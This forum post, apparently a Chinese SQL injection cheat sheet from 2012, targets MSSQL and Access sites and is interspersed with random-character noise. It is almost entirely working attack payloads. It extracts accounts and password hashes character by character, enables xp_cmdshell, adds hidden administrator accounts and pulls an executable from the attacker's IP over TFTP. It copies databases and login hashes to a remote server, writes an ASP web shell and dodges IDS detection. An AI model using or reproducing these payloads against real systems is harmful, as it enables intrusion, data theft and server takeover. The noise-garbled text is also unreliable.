1..判断有无注入点 " Z' T7 G" c; b. P
; and 1=1 and 1=2
+ ]! ~/ _ r/ \, ` f- j" f+ l% ]
a4 V* g: p [& x3 h, h5 H
4 q% O6 w: _1 P+ m- T6 i9 K3 F9 a2.猜表一般的表的名称无非是admin adminuser user pass password 等.. 7 y2 ?; A2 b6 I G: H
and 0<>(select count(*) from *) 8 A( W* M. c) F* h$ T# d# ]# R
and 0<>(select count(*) from admin) ---判断是否存在admin这张表 R4 z& V) S4 D8 \" }3 _8 V
W2 S `* H( R2 F
" G+ y# C' B$ Z* I* U c& ]% e, K3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 ) h8 `" |* t) _$ Q: \/ Y* N
and 0<(select count(*) from admin) 4 N; L" c" J* W5 {5 H/ H
and 1<(select count(*) from admin)
* X) _( ?/ e" n5 h T猜列名还有 and (select count(列名) from 表名)>0
/ s) E8 g6 K' }2 ^/ g, D
' V% A' z* ^( I' x% }4 y- @5 `+ o% J# m2 M/ ?
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. 2 q" y' a7 F: y2 c
and 1=(select count(*) from admin where len(*)>0)-- - g3 b; n% w( B: {' H7 T6 y
and 1=(select count(*) from admin where len(用户字段名称name)>0)
6 R3 K [* l% Tand 1=(select count(*) from admin where len(密码字段名称password)>0) . L: | k* d, b1 |; ^ c% C
& z8 P2 Y+ O* {% N' V
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 : A; x3 t/ e8 r! P* M, ]3 Z
and 1=(select count(*) from admin where len(*)>0)
; j' R: a. l2 m% W( z( O* E+ g! Mand 1=(select count(*) from admin where len(name)>6) 错误
7 Y5 J( \+ Q4 i$ U' {( Band 1=(select count(*) from admin where len(name)>5) 正确 长度是6 2 c: h/ Z/ J0 E7 i
and 1=(select count(*) from admin where len(name)=6) 正确 3 d3 y, M2 m0 u }" U: k; c1 c
& j* G1 g" h H {; R; eand 1=(select count(*) from admin where len(password)>11) 正确
8 x2 _: O) k! {' wand 1=(select count(*) from admin where len(password)>12) 错误 长度是12 T* o2 J/ S' } _0 Z2 j
and 1=(select count(*) from admin where len(password)=12) 正确 ' }4 v1 j8 r9 ?& U" W1 w+ Y# c
猜长度还有 and (select top 1 len(username) from admin)>5# l! }; L4 V5 Z# x8 p
Q0 Z6 E- H5 y& Z2 {
K3 R# R3 Q; t1 }7 |) D6.猜解字符
4 c5 B, e# `! R/ a+ Aand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
: J. D1 V' h1 w% Y4 _0 o" s: F9 tand 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 $ }4 |+ ~' ]% _
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 ! C6 k% Z( I4 l; q5 b ~) @7 i: L
2 o5 I& T7 Q9 d+ Q猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算) a6 j. g* @3 B1 L+ |' M! H2 ~8 |( E
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- ! }, A. q$ a4 Q: N3 a
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符. 3 b" a% A- k. |$ U* X$ O; ~6 s
5 U6 H/ U( u. F# U6 hgroup by users.id having 1=1--
$ C/ |0 C5 ]5 i h( T3 G, B; g$ y+ {7 igroup by users.id, users.username, users.password, users.privs having 1=1-- * `. h2 T9 M9 \% v# Q( m5 l( s
; insert into users values( 666, attacker, foobar, 0xffff )-- & {1 n- W: |; L# v
- y, c6 a# a7 r( W' i9 B
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
$ D0 X+ {3 ?" FUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)- 9 g3 y# ~4 q" C8 ~7 s# h
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)- 4 o2 x. \% w Z/ r
UNION SELECT TOP 1 login_name FROM logintable- - N1 n6 v7 v4 L4 @' a
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
/ h7 O3 d# G. G" ~; A# R9 t# c! q! X
看服务器打的补丁=出错了打了SP4补丁 @% v) H6 g# O1 N' T% d( q- ]
and 1=(select @@VERSION)-- # W0 H) r0 G5 z/ W: w
# g2 m- I# Q6 |4 u7 [看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。
4 _6 P. X+ s! Zand 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-- ; F4 c& J$ R. ]5 L" M$ @6 l
`/ K# D+ ]9 y3 }7 T8 C _判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
7 C$ d+ j. h% B5 Wand sa=(SELECT System_user)--
% Q$ R& o, s* `5 Y; `# b9 fand user_name()=dbo-- 0 Z: G { r4 {1 K# i
and 0<>(select user_name()--
( p0 x- V4 R3 K/ K! C% N- H
6 l% e5 e2 c$ y/ T+ z看xp_cmdshell是否删除 8 n, D) ~# o; V* u7 @2 z+ ~
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)-- 3 v C q5 V2 ~3 F. X, T$ t
0 z2 j; H- E) B; U( |
xp_cmdshell被删除,恢复,支持绝对路径的恢复
; k, s* {3 u- _/ B; t |) w;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
7 }& N5 B$ j; M; l/ ~;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
2 O4 @0 D5 s! B8 I' A. W' y( Y. T: a4 i; Q
反向PING自己实验
; J q E- m% v( B$ B;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
8 j9 l) I! I1 X! e- w
E Y& g8 ~/ r+ b. L8 V4 {4 `加帐号 ' N$ P$ {4 Y1 i2 P! p R$ H
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add-- 4 B$ J: d+ C3 E
% E! v! @3 L a' w4 n) s( \创建一个虚拟目录E盘: 8 S' y. c( y; v% z6 S7 Q v
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--
. K) {0 g3 @$ _# ? W% [5 y' K# i: N; }8 Z$ ?
访问属性:(配合写入一个webshell) + a5 @- }; i. u: z
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
& ?. [8 e* v* |6 @* s& E L, H. ^3 c2 m; E: W" V8 G) Z
1 M+ o | w: [" t% b/ o- K4 yMSSQL也可以用联合查询# x0 V* Q1 r& w; U2 H0 R8 y+ E7 B
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
4 g$ @* c7 J, ^8 X; j" ^?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
9 v6 a' s9 b8 n1 z5 @9 H+ ?
8 h# g8 p9 \9 x8 P' e2 D4 W! c4 k2 k' v" A1 A+ e) K7 D4 K2 V
爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
0 k% _7 ?0 f+ n2 d2 q( G7 p$ }% t
% w/ Z! W% J' }- v6 g: z* o( F( I
0 m: w- e5 K8 E, ^- M5 ?! q) Q$ X
" Z4 k/ N( R% u) v得到WEB路径
3 ?9 k3 ]. d @: L( F" X;create table [dbo].[swap] ([swappass][char](255));-- , c8 h8 a. D( X* Z4 ]
and (select top 1 swappass from swap)=1--
% ^) B+ W( A1 o h4 z;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
A, C7 q, {+ L;use ku1;--
( Y1 ^: v; _1 f0 c, j/ a5 `1 y1 t& d J;create table cmd (str image);-- 建立image类型的表cmd 5 W- ]8 b6 c6 y4 b
' Q% P7 D8 v9 X; M$ S
存在xp_cmdshell的测试过程:
' A. S1 s# A- ?( Z4 |( C( l;exec master..xp_cmdshell dir ! ]: ~7 o- K2 q A/ R$ v$ C
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号 - d% N) C! z2 h" ~
;exec master.dbo.sp_password null,jiaoniang$,1866574;-- ! W8 a% D: w/ O6 T' N0 Z$ r' ~
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
. A; u% l& Z# U! v. \% S* g, M;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
, K" Q) K4 C- z8 R# c( f- p;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;-- " R, X1 k! ~. p2 ^6 P
exec master..xp_servicecontrol start, schedule 启动服务 $ P7 R6 X& z, L
exec master..xp_servicecontrol start, server ! l$ q; T! F3 k+ n3 \
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
& e6 \3 T/ H$ q;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
5 z5 B5 Q9 }0 L5 ]( w' i9 R; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件
A" k- Z% Q' o! R. Y
; s* w2 R n2 C7 H- [;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ + k' Y/ C3 f! e: f6 L
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
J$ H" ^( Q# h: L4 U9 ]: k O3 D;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
: z6 n, K8 u: E$ z# Y如果被限制则可以。 ( D! C7 y5 j9 y# ~
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
# w8 Y* H9 z6 k4 L: a& { v1 g: q# L
查询构造: % \" f4 y# ]2 W7 b4 i' m _! B
SELECT * FROM news WHERE id=... AND topic=... AND .....
4 R" `$ k9 W5 kadminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
- k7 l- x: P- s2 ~( X; T' t" c, e) Vselect 123;--
0 @/ ?- D/ r N( |$ {) u. o) ~;use master;-- 6 a; U& p- Q& C: l" A
:a or name like fff%;-- 显示有一个叫ffff的用户哈。 / |. }! C( f7 B/ ]* Z! ], Y" n
and 1<>(select count(email) from [user]);--
( T" p W2 }3 @( T;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- " Q6 C6 e9 `$ ~" j+ m: r" s4 C! O
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;-- ; r/ W6 ]+ J, o" @2 b' V) g
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;-- . c' ^4 q0 f- t6 D% s0 f) `4 E
;update [users] set email=(select top 1 count(id) from password) where name=ffff;-- 9 I( V' ^; X" t v7 `
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
$ b- e6 Y+ J$ C% Q;update [users] set email=(select top 1 name from password where id=2) where name=ffff;-- / t8 {# G* E7 Z
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。 / ]6 m. {& y1 Q4 [; k
通过查看ffff的用户资料可得第一个用表叫ad
! p" B8 m/ F# a- k& d然后根据表名ad得到这个表的ID 得到第二个表的名字 1 |3 V6 Q$ M, c
7 o, v7 S- e+ ?
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
E2 i* i7 W4 z7 _9 {# Dinsert into users values( 667,123,123,0xffff)--
% C( t' _' X; j2 g' qinsert into users values ( 123, admin--, password, 0xffff)--
# V4 u; p5 M7 d# Z X;and user>0 " x2 R& P$ m( ?2 T
;and (select count(*) from sysobjects)>0 2 B/ d( W! Q) r7 N
;and (select count(*) from mysysobjects)>0 //为access数据库
( l2 |. W( \3 S; M7 N3 `: z( T
8 V d# N4 S( G3 p' L( h0 _& F枚举出数据表名 5 {; r6 D' X! f! F9 D! Z0 J
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
# x+ P& A7 x7 ~0 n* \& k# o这是将第一个表名更新到aaa的字段处。
- s# x: x2 \; C3 Q' w2 y! N7 J读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。 # A! d7 \4 S5 i
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- 2 Y4 L) p$ s G; Y# O
然后id=1552 and exists(select * from aaa where aaa>5)
3 |( M' A' Z+ J1 e读出第二个表,一个个的读出,直到没有为止。
& ]5 @3 t: S8 j0 h% E3 j读字段是这样: & d1 } o8 D' r& A3 N
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
* {. A4 Q. x/ c9 D然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
! O% P/ v) a' ?& V ^* o;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
' f( o9 S* ?0 a8 ]: o" Z$ l* J然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
# g. a: i$ _/ B9 y8 R, L% Y% i
( z! w% H' s: q9 @[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名] 4 O$ C8 P# c- i9 f( _* L
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…) * a7 {0 S5 U3 E1 b+ i( `- d, j4 X/ W
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组] * G, x% H1 n9 o* s
2 ~ `; B% i0 |" l/ h$ j[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名] : D2 w5 t# d5 q/ ^6 L
update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件] 7 N+ B- x2 f. M! o- K8 d q8 h- |3 G3 y
+ Y/ k/ F* c: N& ^! X n+ V绕过IDS的检测[使用变量]
; H. [7 p, T* o2 P;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
- ^9 d2 @) q6 u/ E- |0 };declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
' a h+ m% {1 t+ \% f" }5 Q: e: r# M; o# \
1、 开启远程数据库 ; C& [" E$ [" ~$ \+ F7 B6 ~" `
基本语法 9 y9 g2 p- |7 |1 W4 c4 H/ O
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
# o8 K- t6 W) P% J% V参数: (1) OLEDB Provider name ~5 u* J3 c- H
2、 其中连接字符串参数可以是任何端口用来连接,比如 / Q, w# k: o' z) g* g& | g, u
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table 4 I3 P) P, ?8 T8 I
3.复制目标主机的整个数据库insert所有远程表到本地表。
$ L# H% `0 u/ O, S; i6 `5 M+ i5 W* j5 Q. D9 w, G9 }
基本语法: 3 r6 l& V- k& p7 U. s
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
& y% c7 f+ h* n. t这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:
+ c5 P/ b& l' o; H8 ninsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
5 g* d3 ~5 B ?+ Z/ ninsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases) ' q0 n! i' x9 T; o* M8 ?! O# u) s
select * from master.dbo.sysdatabases 1 s' N4 Y ]+ U
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects) " B" v; S: d' c% J0 z) B% \
select * from user_database.dbo.sysobjects
4 B- b8 W4 \5 L, |5 g. Z5 ^insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
9 E+ T5 f# e: _! _/ J0 W" s uselect * from user_database.dbo.syscolumns 0 r9 y: Y5 q% g, Z! p
复制数据库: / V8 ?4 a4 }# W2 [
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
3 K. n4 c& {" k, @insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
1 `1 |2 E( g+ h4 L Y9 g
* L* F/ |$ w }6 G; d3 j0 ^2 Z1 P5 T; Y复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下:
1 h6 g4 v# @: J$ X7 @insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins * Y4 |6 m' {( J' o9 u* e; n. D
得到hash之后,就可以进行暴力破解。
$ o( x/ }5 Z+ u* ~$ d5 |$ t% t7 x1 P
遍历目录的方法: 先创建一个临时表:temp
$ b) L& x* {2 c;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
: M" G$ Z z9 U+ m;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 % e' m6 k5 |8 c4 a3 e6 f$ G' ]5 |
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
* S0 p0 c' N6 `0 K' n;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中 ' o, \' e% D# G/ `! i6 w
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容 ( {- L& s W; B
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;-- $ K$ Y4 n( ], I/ X. d% W5 q
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
; }/ Z0 m& i0 \; R# L! f" S+ i, t! s;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc 0 [& \6 p- f7 g. h- T
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC) . D) E! B. F5 H7 @4 y. H
写入表: 7 f/ C4 P2 g8 A
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));-- , o6 p, H, B# ~3 \1 \
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
) T( W, Y4 l9 B语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
* Z8 O( ?6 K# k8 A+ y1 V* {7 K语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- , d2 g K# F1 w
语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- 2 G: H1 r/ r- b+ w9 L
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
, g. i- ~0 B, z4 {: p! q* i语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
3 |1 O& l% z1 M( ~5 ^" n9 U- u0 S# T语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- " P5 p/ n9 R8 r M
语句9:and 1=(SELECT IS_MEMBER(db_owner));--
8 U B( K3 K% F9 M, C: b5 W& V8 F/ G `3 K; w+ u4 K8 c1 ]
把路径写到表中去:
+ [6 l, r: s- R) e6 Z;create table dirs(paths varchar(100), id int)--
+ }9 x, s s1 Q# p0 q9 R- `1 i/ T;insert dirs exec master.dbo.xp_dirtree c:\-- & }. z# F; M X: T! p' [% V, A) d$ F
and 0<>(select top 1 paths from dirs)--
/ a% Z% y& P- x/ N0 Kand 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- " A; g+ ` T5 m; V+ p! U
;create table dirs1(paths varchar(100), id int)--
3 z* D. x& R% }) j( v' `;insert dirs exec master.dbo.xp_dirtree e:\web--
* P7 L, B; o( o' G4 K+ M" q$ O. Zand 0<>(select top 1 paths from dirs1)--
/ E2 t+ R+ x, F2 s f0 j( z. P) o( O* |" N5 C, B
把数据库备份到网页目录:下载
w" [- [& X: L6 u' L;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
6 X' ]8 {( c q5 q7 J1 y( `! S5 N
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) 0 W; u- \% e* y
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
( ]' }+ ?5 q5 @! L k# d. W! r/ u7 Iand 1=(select user_id from USER_LOGIN)
: n5 a3 c3 E0 G3 L S) Z* land 0=(select user from USER_LOGIN where user>1) 1 N: w2 b" ?' P3 C4 `7 C9 v* M
2 R& a) h) E: h! L; ?' L. J- x-=- wscript.shell example -=- 3 e% F6 x* a0 S9 B0 m4 u
declare @o int : ^$ U R( H6 V p& z2 |
exec sp_oacreate wscript.shell, @o out ; E' W5 x4 ^4 p# p# Y( V' f
exec sp_oamethod @o, run, NULL, notepad.exe
# y1 L" @, A. Q; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
7 v1 A4 U) j ~3 T( E: ?
, ?5 m% x2 P7 f( S3 u9 b1 Bdeclare @o int, @f int, @t int, @ret int
# ?: u: v, R* d; adeclare @line varchar(8000)
, X8 Z2 e: c# }, [exec sp_oacreate scripting.filesystemobject, @o out 8 V. x6 [) U. f, Y
exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1 / P! G7 ?# E* t) p: P
exec @ret = sp_oamethod @f, readline, @line out 4 R7 F; t1 @! b1 F- J
while( @ret = 0 ) , q0 \3 ~2 u I- |) s
begin 5 o5 _- S3 s0 {2 c
print @line
# i$ F4 t4 t' aexec @ret = sp_oamethod @f, readline, @line out
' ^! o0 u: l# J s( z* q& rend
; N# F8 E& F' D& U, E8 B1 X+ c7 c- R+ d0 V9 P
declare @o int, @f int, @t int, @ret int / z6 H. k" g3 X0 I2 [8 c
exec sp_oacreate scripting.filesystemobject, @o out 5 J) f2 A6 p8 W
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
8 b5 D/ K9 v/ Y7 T: Zexec @ret = sp_oamethod @f, writeline, NULL,
8 W4 |; s3 b! c) ^+ h R<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
( m* Z. B0 b4 u) W9 |
- h: F8 f. ~- \' edeclare @o int, @ret int
1 o* P0 I) u! m# t) m& n3 fexec sp_oacreate speech.voicetext, @o out
/ ]2 A" q7 d7 c* F, m9 texec sp_oamethod @o, register, NULL, foo, bar / o: j7 g) r) X( {% W8 h; r
exec sp_oasetproperty @o, speed, 150 1 r' T) h9 Y# G& S1 J; a E
exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 6 h" `% p( V& `6 [7 A7 X9 o
waitfor delay 00:00:05
. m2 b% C, P+ i- z3 l& P8 y3 G2 i! y! o4 |4 V( e
; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- ' a8 x+ P% x2 I
7 J6 I+ `) a3 V+ j1 Y* W" p
xp_dirtree适用权限PUBLIC
$ o M6 l0 ]& e# p0 Lexec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
8 t# M8 c0 K! z Screate table dirs(paths varchar(100), id int) 0 @* ~5 _4 F: }$ v$ z3 h
建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。 ! [5 P8 ~4 k9 L: B
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!
6 d7 a7 e% ^- S( g2 l" U1 ` |
发表于 2012-9-15 14:32:40
收藏
支持
反对